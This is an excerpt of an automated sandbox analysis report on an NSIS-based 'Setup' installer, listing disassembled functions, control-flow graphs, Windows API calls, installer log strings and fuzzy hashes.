                                                                                                                                                                                                                                                                control_flow_graph 587 406805-406810 588 406812-406821 587->588 589 406823-406837 587->589 588->589 590 406839-406846 589->590 591 40684f-406855 589->591 590->591 594 406848-40684b 590->594 592 406a81-406a8a 591->592 593 40685b-40685c 591->593 596 406a95-406a96 592->596 597 406a8c-406a90 call 406009 592->597 595 40685d-40686a 593->595 594->591 598 406870-406880 595->598 599 406a7f-406a80 595->599 597->596 601 406886-406889 598->601 602 406a5a 598->602 599->592 603 406a5d 601->603 604 40688f-4068cd 601->604 602->603 605 406a6d-406a70 603->605 606 406a5f-406a6b 603->606 607 4068d3-4068de GetVersion 604->607 608 4069ed-4069f6 604->608 611 406a73-406a79 605->611 606->611 612 4068e0-4068e8 607->612 613 4068fc 607->613 609 4069f8-4069fb 608->609 610 406a2f-406a38 608->610 616 406a0b-406a1a call 406009 609->616 617 4069fd-406a09 call 405f51 609->617 614 406a46-406a58 lstrlenW 610->614 615 406a3a-406a41 call 406805 610->615 611->595 611->599 612->613 618 4068ea-4068ee 612->618 619 406903-40690a 613->619 614->611 615->614 628 406a1f-406a25 616->628 617->628 618->613 622 4068f0-4068f4 618->622 624 40690c-40690e 619->624 625 40690f-406911 619->625 622->613 627 4068f6-4068fa 622->627 624->625 629 406913-406939 call 405ed3 625->629 630 40694d-406950 625->630 627->619 628->614 634 406a27-406a2d call 406038 628->634 640 4069d9-4069dd 629->640 641 40693f-406948 call 406805 629->641 632 406960-406963 630->632 633 406952-40695e GetSystemDirectoryW 630->633 637 406965-406973 GetWindowsDirectoryW 632->637 638 4069cf-4069d1 632->638 636 4069d3-4069d7 633->636 634->614 636->634 636->640 637->638 638->636 642 406975-40697f 638->642 640->634 645 4069df-4069eb lstrcatW 640->645 641->636 646 406981-406984 642->646 647 406999-4069af SHGetSpecialFolderLocation 642->647 645->634 646->647 649 406986-40698d 646->649 650 4069b1-4069c8 SHGetPathFromIDListW CoTaskMemFree 647->650 651 4069ca-4069cc 647->651 652 406995-406997 649->652 650->636 650->651 651->638 652->636 652->647
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                                                                                                                                                                                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                • API String ID: 3581403547-784952888
                                                                                                                                                                                                                                                                • Opcode ID: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
                                                                                                                                                                                                                                                                • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                                                                                                                                                                                                                                Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 853 4074bb-4074c0 854 4074c2-4074ef 853->854 855 40752f-407547 853->855 857 4074f1-4074f4 854->857 858 4074f6-4074fa 854->858 856 407aeb-407aff 855->856 862 407b01-407b17 856->862 863 407b19-407b2c 856->863 859 407506-407509 857->859 860 407502 858->860 861 4074fc-407500 858->861 864 407527-40752a 859->864 865 40750b-407514 859->865 860->859 861->859 866 407b33-407b3a 862->866 863->866 869 4076f6-407713 864->869 870 407516 865->870 871 407519-407525 865->871 867 407b61-407c68 866->867 868 407b3c-407b40 866->868 884 407350 867->884 885 407cec 867->885 873 407b46-407b5e 868->873 874 407ccd-407cd4 868->874 876 407715-407729 869->876 877 40772b-40773e 869->877 870->871 872 407589-4075b6 871->872 880 4075d2-4075ec 872->880 881 4075b8-4075d0 872->881 873->867 878 407cdd-407cea 874->878 882 407741-40774b 876->882 877->882 883 407cef-407cf6 878->883 886 4075f0-4075fa 880->886 881->886 887 40774d 882->887 888 4076ee-4076f4 882->888 889 407357-40735b 884->889 890 40749b-4074b6 884->890 891 40746d-407471 884->891 892 4073ff-407403 884->892 885->883 895 407600 886->895 896 407571-407577 886->896 897 407845-4078a1 887->897 898 4076c9-4076cd 887->898 888->869 894 407692-40769c 888->894 889->878 899 407361-40736e 889->899 890->856 904 407c76-407c7d 891->904 905 407477-40748b 891->905 910 407409-407420 892->910 911 407c6d-407c74 892->911 900 4076a2-4076c4 894->900 901 407c9a-407ca1 894->901 913 407556-40756e 895->913 914 407c7f-407c86 895->914 902 40762a-407630 896->902 903 40757d-407583 896->903 897->856 906 407c91-407c98 898->906 907 4076d3-4076eb 898->907 899->885 915 407374-4073ba 899->915 900->897 901->878 916 40768e 902->916 917 407632-40764f 902->917 903->872 903->916 904->878 912 40748e-407496 905->912 906->878 907->888 918 407423-407427 910->918 911->878 912->891 922 407498 912->922 913->896 914->878 920 4073e2-4073e4 915->920 921 4073bc-4073c0 915->921 916->894 923 407651-407665 917->923 924 407667-40767a 917->924 918->892 919 407429-40742f 918->919 926 407431-407438 919->926 927 407459-40746b 919->927 930 4073f5-4073fd 920->930 931 4073e6-4073f3 920->931 928 4073c2-4073c5 GlobalFree 921->928 929 4073cb-4073d9 GlobalAlloc 921->929 922->890 925 40767d-407687 923->925 924->925 925->902 932 407689 925->932 933 407443-407453 GlobalAlloc 926->933 934 40743a-40743d GlobalFree 926->934 927->912 928->929 929->885 935 4073df 929->935 930->918 931->930 931->931 937 407c88-407c8f 932->937 938 40760f-407627 932->938 933->885 933->927 934->933 935->920 937->878 938->902
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                                                                                                                                                                                • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                                                                                                                                                                                                                Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 310444273-0
                                                                                                                                                                                                                                                                • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                                                                                                                                                                                • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                                                                                                                                                                                                                Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                                                                                                                                • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                                                                                                                                                                                • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8
                                                                                                                                                                                                                                                                Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 56 405479-40548b 57 405491-405497 56->57 58 4055cd-4055dc 56->58 57->58 59 40549d-4054a6 57->59 60 40562b-405640 58->60 61 4055de-405626 GetDlgItem * 2 call 403d3f SetClassLongW call 40141d 58->61 62 4054a8-4054b5 SetWindowPos 59->62 63 4054bb-4054be 59->63 65 405680-405685 call 403daf 60->65 66 405642-405645 60->66 61->60 62->63 68 4054c0-4054d2 ShowWindow 63->68 69 4054d8-4054de 63->69 74 40568a-4056a5 65->74 71 405647-405652 call 40139d 66->71 72 405678-40567a 66->72 68->69 75 4054e0-4054f5 DestroyWindow 69->75 76 4054fa-4054fd 69->76 71->72 93 405654-405673 SendMessageW 71->93 72->65 73 405920 72->73 81 405922-405929 73->81 79 4056a7-4056a9 call 40141d 74->79 80 4056ae-4056b4 74->80 82 4058fd-405903 75->82 84 405510-405516 76->84 85 4054ff-40550b SetWindowLongW 76->85 79->80 89 4056ba-4056c5 80->89 90 4058de-4058f7 DestroyWindow KiUserCallbackDispatcher 80->90 82->73 87 405905-40590b 82->87 91 4055b9-4055c8 call 403dca 84->91 92 40551c-40552d GetDlgItem 84->92 85->81 87->73 95 40590d-405916 ShowWindow 87->95 89->90 96 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 89->96 90->82 91->81 97 40554c-40554f 92->97 98 40552f-405546 SendMessageW IsWindowEnabled 92->98 93->81 95->73 126 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 96->126 127 40571a-405720 96->127 101 405551-405552 97->101 102 405554-405557 97->102 98->73 98->97 103 405582-405587 call 403d18 101->103 104 405565-40556a 102->104 105 405559-40555f 102->105 103->91 107 4055a0-4055b3 SendMessageW 104->107 109 40556c-405572 104->109 105->107 108 405561-405563 105->108 107->91 108->103 112 405574-40557a call 40141d 109->112 113 405589-405592 call 40141d 109->113 122 405580 112->122 113->91 123 405594-40559e 113->123 122->103 123->122 130 405761-405762 126->130 131 405764 126->131 127->126 132 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 130->132 131->132 133 405796-4057a7 SendMessageW 132->133 134 4057a9 132->134 135 4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 133->135 134->135 135->74 144 4057f3-4057f5 135->144 144->74 145 4057fb-4057ff 144->145 146 405801-405807 145->146 147 40581e-405832 DestroyWindow 145->147 146->73 148 40580d-405813 146->148 147->82 149 405838-405865 CreateDialogParamW 147->149 148->74 150 405819 148->150 149->82 151 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 149->151 150->73 151->73 156 4058c4-4058d7 ShowWindow call 403daf 151->156 158 4058dc 156->158 158->82
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?), ref: 004054D2
                                                                                                                                                                                                                                                                • DestroyWindow.USER32 ref: 004054E6
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00405523
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                                                                                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                                                                                                                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                                                                                                                                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                                                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                                                                                                                                                                                                                                • EnableWindow.USER32(?,?), ref: 00405757
                                                                                                                                                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                                                                                                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                • String ID: @rD
                                                                                                                                                                                                                                                                • API String ID: 3282139019-3814967855
                                                                                                                                                                                                                                                                • Opcode ID: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
                                                                                                                                                                                                                                                                • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E
                                                                                                                                                                                                                                                                Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 185 4030ee-4030f2 160->185 163 401601-401611 call 4062a3 161->163 164 401742-40174f 161->164 165 401962-40197d call 40145c GetFullPathNameW 161->165 166 4019ca-4019e6 call 40145c SearchPathW 161->166 167 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->167 168 401650-40166d call 40137e call 4062a3 call 40139d 161->168 169 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->169 170 401672-401686 call 40145c call 4062a3 161->170 171 401693-4016ac call 401446 call 4062a3 161->171 172 401715-401731 161->172 173 401616-40162d call 40145c call 4062a3 call 404f72 161->173 174 4016d6-4016db 161->174 175 401736-4030de 161->175 176 401897-4018a7 call 40145c call 4062d5 161->176 177 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->177 178 40163c-401645 161->178 179 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->179 163->185 189 401751-401755 ShowWindow 164->189 190 401758-40175f 164->190 224 4019a3-4019a8 165->224 225 40197f-401984 165->225 166->160 217 4019ec-4019f8 166->217 167->160 242 40179a-4017a6 call 4062a3 167->242 168->185 264 401864-40186c 169->264 265 4017de-4017fc call 405d06 CreateDirectoryW 169->265 243 401689-40168e call 404f72 170->243 248 4016b1-4016b8 Sleep 171->248 249 4016ae-4016b0 171->249 172->185 186 401632-401637 173->186 183 401702-401710 174->183 184 4016dd-4016fd call 401446 174->184 175->160 219 4030de call 405f51 175->219 244 4018c2-4018d6 call 4062a3 176->244 245 4018a9-4018bd call 4062a3 176->245 272 401912-401919 177->272 273 40191e-401921 177->273 178->186 187 401647-40164e PostQuitMessage 178->187 179->160 183->160 184->160 186->185 187->186 189->190 190->160 208 401765-401769 ShowWindow 190->208 208->160 217->160 219->160 228 4019af-4019b2 224->228 225->228 235 401986-401989 225->235 228->160 238 4019b8-4019c5 GetShortPathNameW 228->238 235->228 246 40198b-401993 call 4062d5 235->246 238->160 259 4017ab-4017ac 242->259 243->160 244->185 245->185 246->224 269 401995-4019a1 call 406009 246->269 248->160 249->248 259->160 267 401890-401892 264->267 268 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 264->268 277 401846-40184e call 4062a3 265->277 278 4017fe-401809 GetLastError 265->278 267->243 268->160 269->228 272->243 279 401923-40192b call 4062d5 273->279 280 40194a-401950 273->280 292 401853-401854 277->292 283 401827-401832 GetFileAttributesW 278->283 284 40180b-401825 GetLastError call 4062a3 278->284 279->280 298 40192d-401948 call 406c68 call 404f72 279->298 288 401957-40195d call 4062a3 280->288 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->259 290->292 291->264 291->265 292->291 298->288
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
